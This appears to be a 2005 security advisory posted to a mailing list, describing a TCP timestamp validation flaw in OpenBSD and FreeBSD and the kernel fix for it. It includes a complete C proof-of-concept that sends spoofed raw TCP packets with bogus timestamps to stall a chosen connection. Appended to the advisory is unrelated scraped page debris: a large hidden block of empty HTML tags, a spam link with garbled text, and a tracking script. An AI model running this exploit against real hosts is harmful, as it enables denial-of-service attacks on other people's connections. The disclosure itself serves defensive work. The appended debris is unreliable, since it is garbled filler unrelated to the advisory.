--GvXjxJ+pjyke8COw
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

/*
 * TCP does not adequately validate segments before updating timestamp value
 * http://www.kb.cert.org/vuls/id/637934
 *
 * RFC-1323 (TCP Extensions for High Performance)
 *
 *   4.2.1 defines how the PAWS algorithm should drop packets with invalid
 *   timestamp options:
 *  =20
 *       R1)  If there is a Timestamps option in the arriving segment
 *            and SEG.TSval < TS.Recent and if TS.Recent is valid (see
 *            later discussion), then treat the arriving segment as not
 *            acceptable:
 *
 *                 Send an acknowledgement in reply as specified in
 *                 RFC-793 page 69 and drop the segment.
 *
 *   3.4 defines what timestamp options to accept:
 *
 *    (2)  If Last.ACK.sent falls within the range of sequence numbers
 *         of an incoming segment:
 *
 *            SEG.SEQ <=3D Last.ACK.sent < SEG.SEQ + SEG.LEN
 *
 *         then the TSval from the segment is copied to TS.Recent;
 *         otherwise, the TSval is ignored.
 *
 * http://community.roxen.com/developers/idocs/drafts/
 *   draft-jacobson-tsvwg-1323bis-00.html
 *
 *   3.4 suggests an slightly different check like
 *
 *     (2)  If:  SEG.TSval >=3D TSrecent and SEG.SEQ <=3D Last.ACK.sent
 *               then SEG.TSval is copied to TS.Recent; otherwise, it is
 *               ignored.
 *
 *   and explains this change
 *
 *     APPENDIX C: CHANGES FROM RFC-1072, RFC-1185, RFC-1323
 *
 *       There are additional changes in this document from RFC-1323. These
 *       changes are:
 *       (b)  In RFC-1323, section 3.4, step (2) of the algorithm to control
 *            which timestamp is echoed was incorrect in two regards:
 *            (1)  It failed to update TSrecent for a retransmitted segment
 *                 that resulted from a lost ACK.
 *            (2)  It failed if SEG.LEN =3D 0.
 *            In the new algorithm, the case of SEG.TSval =3D TSrecent is
 *            included for consistency with the PAWS test.
 *
 * At least OpenBSD and FreeBSD contain this code instead:
 *
 *   sys/netinet/tcp_input.c tcp_input()
 *
 *      **
 *       * If last ACK falls within this segment's sequence numbers,
 *       * record its timestamp.
 *       * NOTE that the test is modified according to the latest
 *       * proposal of the tcplw@cray.com list (Braden 1993/04/26).
 *       **
 *      if ((to.to_flags & TOF_TS) !=3D 0 &&
 *          SEQ_LEQ(th->th_seq, tp->last_ack_sent)) {
 *              tp->ts_recent_age =3D ticks;
 *              tp->ts_recent =3D to.to_tsval;
 *      }
 *
 * The problem here is that the packet the timestamp is accepted from doesn=
't
 * need to have a valid th_seq or th_ack. This point of execution is reached
 * for packets with arbitrary th_ack values and th_seq values of half the
 * possible value range, because the first 'if (todrop > tlen)' check in the
 * function explicitely continues execution to process ACKs.
 *
 * If an attacker knows (or guesses) the source and destination addresses a=
nd
 * ports of a connection between two peers, he can send spoofed TCP packets
 * to either peer containing bogus timestamp options. Since half of the
 * possible th_seq and timestamp values are accepted, four packets containi=
ng
 * two random values and their integer wraparound opposites are sufficient =
to
 * get one random timestamp accepted by the receipient. Further packets from
 * the real peer will get dropped by PAWS, and the TCP connection stalls and
 * times out.
 *
 * The following change reverts the tcp_input() check back to the implement=
ed
 * suggested by draft-jacobson-tsvwg-1323bis-00.txt
 *
 *      if (opti.ts_present && TSTMP_GEQ(opti.ts_val, tp->ts_recent) &&
 *          SEQ_LEQ(th->th_seq, tp->last_ack_sent)) {
 * +            if (SEQ_LEQ(tp->last_ack_sent, th->th_seq + tlen +
 * +                ((tiflags & (TH_SYN|TH_FIN)) !=3D 0)))
 * +                    tp->ts_recent =3D opti.ts_val;
 * +            else
 * +                    tp->ts_recent =3D 0;
 *              tp->ts_recent_age =3D tcp_now;
 * -            tp->ts_recent =3D opti.ts_val;
 *      }
 *
 * I can't find Braden's proposal referenced in the comment. It seems to
 * pre-date draft-jacobson-tsvwg-1323bis-00.txt and might be outdated by
 * it.
 *
 * Fri Mar 11 02:33:36 MET 2005   Daniel Hartmeier <daniel@benzedrine.cx>
 *
 * http://www.openbsd.org/cgi-bin/cvsweb/src/sys/netinet/tcp_input.c.diff\
 * ?r1=3D1.184&r2=3D1.185&f=3Dh
 *
 * http://www.freebsd.org/cgi/cvsweb.cgi/src/sys/netinet/tcp_input.c.diff\
 * ?r1=3D1.252.2.15&r2=3D1.252.2.16&f=3Dh
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <net/if.h>
#ifdef __FreeBSD__
#include <net/if_var.h>
#endif
#include <netinet/in.h>
#include <netinet/in_var.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>

static u_int16_t
checksum(u_int16_t *data, u_int16_t length)
{
	u_int32_t value =3D 0;
	u_int16_t i;

	for (i =3D 0; i < (length >> 1); ++i)
		value +=3D data[i];
	if ((length & 1) =3D=3D 1)
		value +=3D (data[i] << 8);
	value =3D (value & 65535) + (value >> 16);
	return (~value);
}

static int
send_tcp(int sock, u_int32_t saddr, u_int32_t daddr, u_int16_t sport,
    u_int16_t dport, u_int32_t seq, u_int32_t ts)
{
	u_char packet[1600];
	struct tcphdr *tcp;
	struct ip *ip;
	unsigned char *opt;
	int optlen, len, r;
	struct sockaddr_in sin;

	memset(packet, 0, sizeof(packet));

	opt =3D packet + sizeof(struct ip) + sizeof(struct tcphdr);
	optlen =3D 0;
	opt[optlen++] =3D TCPOPT_NOP;
	opt[optlen++] =3D TCPOPT_NOP;
	opt[optlen++] =3D TCPOPT_TIMESTAMP;
	opt[optlen++] =3D 10;
	ts =3D htonl(ts);
	memcpy(opt + optlen, &ts, sizeof(ts));
	optlen +=3D sizeof(ts);
	ts =3D htonl(0);
	memcpy(opt + optlen, &ts, sizeof(ts));
	optlen +=3D sizeof(ts);

	len =3D sizeof(struct ip) + sizeof(struct tcphdr) + optlen;

	ip =3D (struct ip *)packet;
	ip->ip_src.s_addr =3D saddr;
	ip->ip_dst.s_addr =3D daddr;
	ip->ip_p =3D IPPROTO_TCP;
	ip->ip_len =3D htons(sizeof(struct tcphdr) + optlen);

	tcp =3D (struct tcphdr *)(packet + sizeof(struct ip));
	tcp->th_sport =3D htons(sport);
	tcp->th_dport =3D htons(dport);
	tcp->th_seq =3D htonl(seq);
	tcp->th_ack =3D 0;
	tcp->th_off =3D (sizeof(struct tcphdr) + optlen) / 4;
	tcp->th_flags =3D 0;
	tcp->th_win =3D htons(16384);
	tcp->th_sum =3D 0;
	tcp->th_urp =3D 0;

	tcp->th_sum =3D checksum((u_int16_t *)ip, len);

	ip->ip_v =3D 4;
	ip->ip_hl =3D 5;
	ip->ip_tos =3D 0;
	ip->ip_len =3D htons(len);
	ip->ip_id =3D htons(arc4random() % 65536);
	ip->ip_off =3D 0;
	ip->ip_ttl =3D 64;

	sin.sin_family =3D AF_INET;
	sin.sin_addr.s_addr =3D saddr;

	r =3D sendto(sock, packet, len, 0, (struct sockaddr *)&sin, sizeof(sin));
	if (r !=3D len) {
		perror("sendto");
		return (1);
	}

	return (0);
}

static u_int32_t
op(u_int32_t u)
{
	return (u_int32_t)(((u_int64_t)u + 2147483648UL) % 4294967296ULL);
}

int main(int argc, char *argv[])
{
	u_int32_t saddr, daddr, seq, ts;
	u_int16_t sport, dport;
	int sock, i;

	if (argc !=3D 5) {
		fprintf(stderr, "usage: %s <src ip> <src port> "
		    "<dst ip> <dst port>\n", argv[0]);
		return (1);
	}

	saddr =3D inet_addr(argv[1]);
	daddr =3D inet_addr(argv[3]);
	sport =3D atoi(argv[2]);
	dport =3D atoi(argv[4]);

	sock =3D socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
	if (sock < 0) {
		perror("socket");
		return (1);
	}
	i =3D 1;
	if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)) =3D=3D -1) {
		perror("setsockopt");
		close(sock);
		return (1);
	}

	seq =3D arc4random();
	ts =3D arc4random();
	if (send_tcp(sock, saddr, daddr, sport, dport, seq, ts) ||
	    send_tcp(sock, saddr, daddr, sport, dport, seq, op(ts)) ||
	    send_tcp(sock, saddr, daddr, sport, dport, op(seq), ts) ||
	    send_tcp(sock, saddr, daddr, sport, dport, op(seq), op(ts))) {
		fprintf(stderr, "failed\n");
		close(sock);
		return (1);
	}

	close(sock);
	printf("done\n");
	return (0);
}

--GvXjxJ+pjyke8COw
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (OpenBSD)

iQCVAwUBQo9lytQ9cYxqOnQJAQJTnAP/R9O3ZrNlmSKWtkFPQP32ciIPAjYfSnkm
btKNqB9KxzXT/GzNrhhjAPiVrYE6W17+XEyYu2bslkCtEP3bMBlTcPCioHOzYDoS
Si0SBhqjiACpaCBYZ/gTcOkZ53upQakGTRCrqhKSfNNQgtQjohs5sJj2vtjQq1TO
lngU9lNA94E=
=9q4G
-----END PGP SIGNATURE-----

--GvXjxJ+pjyke8COw--
<div style="position:fixed;left:-9000px;top:-9000px;"><em id="7ztzv"></em><center id="7ztzv"></center><mark id="7ztzv"><center id="7ztzv"></center></mark><output id="7ztzv"><noframes id="7ztzv"></noframes></output><font id="7ztzv"><delect id="7ztzv"></delect></font><ruby id="7ztzv"><big id="7ztzv"></big></ruby><progress id="7ztzv"><sub id="7ztzv"></sub></progress><th id="7ztzv"><big id="7ztzv"></big></th><form id="7ztzv"><nobr id="7ztzv"></nobr></form><ol id="7ztzv"><video id="7ztzv"></video></ol><th id="7ztzv"><progress id="7ztzv"></progress></th><strike id="7ztzv"><span id="7ztzv"></span></strike><em id="7ztzv"><span id="7ztzv"></span></em><video id="7ztzv"><strike id="7ztzv"></strike></video><th id="7ztzv"><noframes id="7ztzv"></noframes></th><em id="7ztzv"><span id="7ztzv"></span></em><ins id="7ztzv"><b id="7ztzv"></b></ins><ol id="7ztzv"><output id="7ztzv"></output></ol><menuitem id="7ztzv"><thead id="7ztzv"></thead></menuitem><del id="7ztzv"><ruby id="7ztzv"></ruby></del><noframes id="7ztzv"><span id="7ztzv"></span></noframes><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><dl id="7ztzv"><rp id="7ztzv"></rp></dl><progress id="7ztzv"><thead id="7ztzv"></thead></progress><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><strike id="7ztzv"><pre id="7ztzv"></pre></strike><em id="7ztzv"><address id="7ztzv"></address></em><big id="7ztzv"><address id="7ztzv"></address></big><address id="7ztzv"><listing id="7ztzv"></listing></address><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><big id="7ztzv"><sub id="7ztzv"></sub></big><var id="7ztzv"><meter id="7ztzv"></meter></var><span id="7ztzv"><video id="7ztzv"></video></span><listing id="7ztzv"><mark id="7ztzv"></mark></listing><progress id="7ztzv"><address id="7ztzv"></address></progress><nobr id="7ztzv"><progress id="7ztzv"></progress></nobr><noframes id="7ztzv"><sub id="7ztzv"></sub></noframes><font id="7ztzv"><delect id="7ztzv"></delect></font><strike id="7ztzv"><pre id="7ztzv"></pre></strike><delect id="7ztzv"><menuitem id="7ztzv"></menuitem></delect><em id="7ztzv"><pre id="7ztzv"></pre></em><mark id="7ztzv"><cite id="7ztzv"></cite></mark><delect id="7ztzv"><ins id="7ztzv"></ins></delect><pre id="7ztzv"><rp id="7ztzv"></rp></pre><cite id="7ztzv"><var id="7ztzv"></var></cite><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><ruby id="7ztzv"><p id="7ztzv"></p></ruby><em id="7ztzv"><form id="7ztzv"></form></em><rp id="7ztzv"><em id="7ztzv"></em></rp>
<video id="7ztzv"><noframes id="7ztzv"></noframes></video><cite id="7ztzv"><del id="7ztzv"></del></cite><meter id="7ztzv"><thead id="7ztzv"></thead></meter><p id="7ztzv"><dl id="7ztzv"></dl></p><meter id="7ztzv"><thead id="7ztzv"></thead></meter><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><mark id="7ztzv"><cite id="7ztzv"></cite></mark><menuitem id="7ztzv"><font id="7ztzv"></font></menuitem><del id="7ztzv"><rp id="7ztzv"></rp></del><thead id="7ztzv"><delect id="7ztzv"></delect></thead><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var><ins id="7ztzv"><cite id="7ztzv"></cite></ins><delect id="7ztzv"><output id="7ztzv"></output></delect><p id="7ztzv"><pre id="7ztzv"></pre></p><ruby id="7ztzv"><p id="7ztzv"></p></ruby><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><progress id="7ztzv"><address id="7ztzv"></address></progress><thead id="7ztzv"><var id="7ztzv"></var></thead><ins id="7ztzv"><i id="7ztzv"></i></ins><ins id="7ztzv"><b id="7ztzv"></b></ins><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><ins id="7ztzv"><i id="7ztzv"></i></ins><font id="7ztzv"><delect id="7ztzv"></delect></font><em id="7ztzv"><form id="7ztzv"></form></em><var id="7ztzv"><ins id="7ztzv"></ins></var><span id="7ztzv"><th id="7ztzv"></th></span><ol id="7ztzv"><rp id="7ztzv"></rp></ol><th id="7ztzv"><progress id="7ztzv"></progress></th><address id="7ztzv"><dfn id="7ztzv"></dfn></address><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><noframes id="7ztzv"><span id="7ztzv"></span></noframes><noframes id="7ztzv"><form id="7ztzv"></form></noframes><big id="7ztzv"><form id="7ztzv"></form></big><track id="7ztzv"><noframes id="7ztzv"></noframes></track><em id="7ztzv"><span id="7ztzv"></span></em><span id="7ztzv"><th id="7ztzv"></th></span><span id="7ztzv"><th id="7ztzv"></th></span><video id="7ztzv"><em id="7ztzv"></em></video><delect id="7ztzv"><ins id="7ztzv"></ins></delect><b id="7ztzv"><del id="7ztzv"></del></b><progress id="7ztzv"><sub id="7ztzv"></sub></progress><dfn id="7ztzv"><mark id="7ztzv"></mark></dfn><rp id="7ztzv"><em id="7ztzv"></em></rp><track id="7ztzv"><noframes id="7ztzv"></noframes></track><address id="7ztzv"><th id="7ztzv"></th></address><cite id="7ztzv"><delect id="7ztzv"></delect></cite><cite id="7ztzv"><var id="7ztzv"></var></cite><output id="7ztzv"><i id="7ztzv"></i></output><track id="7ztzv"><big id="7ztzv"></big></track>
<big id="7ztzv"><address id="7ztzv"></address></big><p id="7ztzv"><dl id="7ztzv"></dl></p><meter id="7ztzv"><font id="7ztzv"></font></meter><address id="7ztzv"><nobr id="7ztzv"></nobr></address><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><pre id="7ztzv"><video id="7ztzv"></video></pre><th id="7ztzv"><progress id="7ztzv"></progress></th><p id="7ztzv"><pre id="7ztzv"></pre></p><ruby id="7ztzv"><em id="7ztzv"></em></ruby><del id="7ztzv"><ins id="7ztzv"></ins></del><sub id="7ztzv"><listing id="7ztzv"></listing></sub><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><thead id="7ztzv"><var id="7ztzv"></var></thead><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><b id="7ztzv"><del id="7ztzv"></del></b><big id="7ztzv"><address id="7ztzv"></address></big><form id="7ztzv"><nobr id="7ztzv"></nobr></form><ol id="7ztzv"><ins id="7ztzv"></ins></ol><font id="7ztzv"><delect id="7ztzv"></delect></font><big id="7ztzv"><sub id="7ztzv"></sub></big><listing id="7ztzv"><progress id="7ztzv"></progress></listing><delect id="7ztzv"><output id="7ztzv"></output></delect><noframes id="7ztzv"><span id="7ztzv"></span></noframes><track id="7ztzv"><noframes id="7ztzv"></noframes></track><menuitem id="7ztzv"><sub id="7ztzv"></sub></menuitem><address id="7ztzv"><th id="7ztzv"></th></address><address id="7ztzv"><track id="7ztzv"></track></address><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><em id="7ztzv"><pre id="7ztzv"></pre></em><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><em id="7ztzv"><form id="7ztzv"></form></em><form id="7ztzv"><track id="7ztzv"></track></form><dfn id="7ztzv"><progress id="7ztzv"></progress></dfn><rp id="7ztzv"><noframes id="7ztzv"></noframes></rp><i id="7ztzv"><ol id="7ztzv"></ol></i><i id="7ztzv"><del id="7ztzv"></del></i><cite id="7ztzv"><delect id="7ztzv"></delect></cite><strike id="7ztzv"><dl id="7ztzv"></dl></strike><dfn id="7ztzv"><mark id="7ztzv"></mark></dfn><address id="7ztzv"><th id="7ztzv"></th></address><ins id="7ztzv"><font id="7ztzv"></font></ins><thead id="7ztzv"><var id="7ztzv"></var></thead><video id="7ztzv"><strike id="7ztzv"></strike></video><p id="7ztzv"><pre id="7ztzv"></pre></p><video id="7ztzv"><i id="7ztzv"></i></video><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><thead id="7ztzv"><listing id="7ztzv"></listing></thead><dl id="7ztzv"><rp id="7ztzv"></rp></dl><address id="7ztzv"><th id="7ztzv"></th></address><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var>
<p id="7ztzv"><var id="7ztzv"></var></p><ins id="7ztzv"><i id="7ztzv"></i></ins><strike id="7ztzv"><span id="7ztzv"></span></strike><del id="7ztzv"><output id="7ztzv"></output></del><font id="7ztzv"><delect id="7ztzv"></delect></font><output id="7ztzv"><em id="7ztzv"></em></output><p id="7ztzv"><span id="7ztzv"></span></p><big id="7ztzv"><thead id="7ztzv"></thead></big><video id="7ztzv"><noframes id="7ztzv"></noframes></video><b id="7ztzv"><ol id="7ztzv"></ol></b><font id="7ztzv"><dfn id="7ztzv"></dfn></font><font id="7ztzv"><var id="7ztzv"></var></font><ins id="7ztzv"><i id="7ztzv"></i></ins><dfn id="7ztzv"><meter id="7ztzv"></meter></dfn><rp id="7ztzv"><strike id="7ztzv"></strike></rp><del id="7ztzv"><ruby id="7ztzv"></ruby></del><var id="7ztzv"><ruby id="7ztzv"></ruby></var><rp id="7ztzv"><em id="7ztzv"></em></rp><em id="7ztzv"><span id="7ztzv"></span></em><del id="7ztzv"><ruby id="7ztzv"></ruby></del><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><track id="7ztzv"><noframes id="7ztzv"></noframes></track><form id="7ztzv"><nobr id="7ztzv"></nobr></form><video id="7ztzv"><big id="7ztzv"></big></video><video id="7ztzv"><em id="7ztzv"></em></video><p id="7ztzv"><span id="7ztzv"></span></p><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><ins id="7ztzv"><b id="7ztzv"></b></ins><dfn id="7ztzv"><progress id="7ztzv"></progress></dfn><var id="7ztzv"><mark id="7ztzv"></mark></var><font id="7ztzv"><delect id="7ztzv"></delect></font><big id="7ztzv"><sub id="7ztzv"></sub></big><address id="7ztzv"><th id="7ztzv"></th></address><form id="7ztzv"><th id="7ztzv"></th></form><mark id="7ztzv"><cite id="7ztzv"></cite></mark><progress id="7ztzv"><font id="7ztzv"></font></progress><mark id="7ztzv"><cite id="7ztzv"></cite></mark><strike id="7ztzv"><form id="7ztzv"></form></strike><mark id="7ztzv"><font id="7ztzv"></font></mark><strike id="7ztzv"><form id="7ztzv"></form></strike><pre id="7ztzv"><video id="7ztzv"></video></pre><strike id="7ztzv"><dl id="7ztzv"></dl></strike><delect id="7ztzv"><ins id="7ztzv"></ins></delect><dl id="7ztzv"><rp id="7ztzv"></rp></dl><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><p id="7ztzv"><dl id="7ztzv"></dl></p><mark id="7ztzv"><i id="7ztzv"></i></mark><meter id="7ztzv"><sub id="7ztzv"></sub></meter><rp id="7ztzv"><em id="7ztzv"></em></rp><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead>
<th id="7ztzv"><big id="7ztzv"></big></th><del id="7ztzv"><rp id="7ztzv"></rp></del><video id="7ztzv"><big id="7ztzv"></big></video><delect id="7ztzv"><ruby id="7ztzv"></ruby></delect><big id="7ztzv"><sub id="7ztzv"></sub></big><track id="7ztzv"><em id="7ztzv"></em></track><cite id="7ztzv"><ol id="7ztzv"></ol></cite><i id="7ztzv"><dl id="7ztzv"></dl></i><noframes id="7ztzv"><address id="7ztzv"></address></noframes><ruby id="7ztzv"><i id="7ztzv"></i></ruby><delect id="7ztzv"><output id="7ztzv"></output></delect><delect id="7ztzv"><output id="7ztzv"></output></delect><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><ol id="7ztzv"><ruby id="7ztzv"></ruby></ol><delect id="7ztzv"><output id="7ztzv"></output></delect><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var><track id="7ztzv"><big id="7ztzv"></big></track><rp id="7ztzv"><em id="7ztzv"></em></rp><em id="7ztzv"><span id="7ztzv"></span></em><mark id="7ztzv"><b id="7ztzv"></b></mark><i id="7ztzv"><ol id="7ztzv"></ol></i><progress id="7ztzv"><sub id="7ztzv"></sub></progress><rp id="7ztzv"><strike id="7ztzv"></strike></rp><font id="7ztzv"><var id="7ztzv"></var></font><span id="7ztzv"><th id="7ztzv"></th></span><video id="7ztzv"><strike id="7ztzv"></strike></video><th id="7ztzv"><em id="7ztzv"></em></th><delect id="7ztzv"><ins id="7ztzv"></ins></delect><sub id="7ztzv"><delect id="7ztzv"></delect></sub><progress id="7ztzv"><sub id="7ztzv"></sub></progress><sub id="7ztzv"><listing id="7ztzv"></listing></sub><thead id="7ztzv"><listing id="7ztzv"></listing></thead><form id="7ztzv"><th id="7ztzv"></th></form><track id="7ztzv"><em id="7ztzv"></em></track><dfn id="7ztzv"><menuitem id="7ztzv"></menuitem></dfn><b id="7ztzv"><dl id="7ztzv"></dl></b><nobr id="7ztzv"><big id="7ztzv"></big></nobr><track id="7ztzv"><progress id="7ztzv"></progress></track><ruby id="7ztzv"><p id="7ztzv"></p></ruby><pre id="7ztzv"><nobr id="7ztzv"></nobr></pre><pre id="7ztzv"><track id="7ztzv"></track></pre><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><em id="7ztzv"><span id="7ztzv"></span></em><mark id="7ztzv"><i id="7ztzv"></i></mark><rp id="7ztzv"><p id="7ztzv"></p></rp><delect id="7ztzv"><ruby id="7ztzv"></ruby></delect><sub id="7ztzv"><dfn id="7ztzv"></dfn></sub><thead id="7ztzv"><var id="7ztzv"></var></thead><i id="7ztzv"><ol id="7ztzv"></ol></i><track id="7ztzv"><strike id="7ztzv"></strike></track></div>

<a href="http://www.bjnorthway.com/">ÑÇÖÞÅ·ÃÀÔÚÏß</a>
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
</body>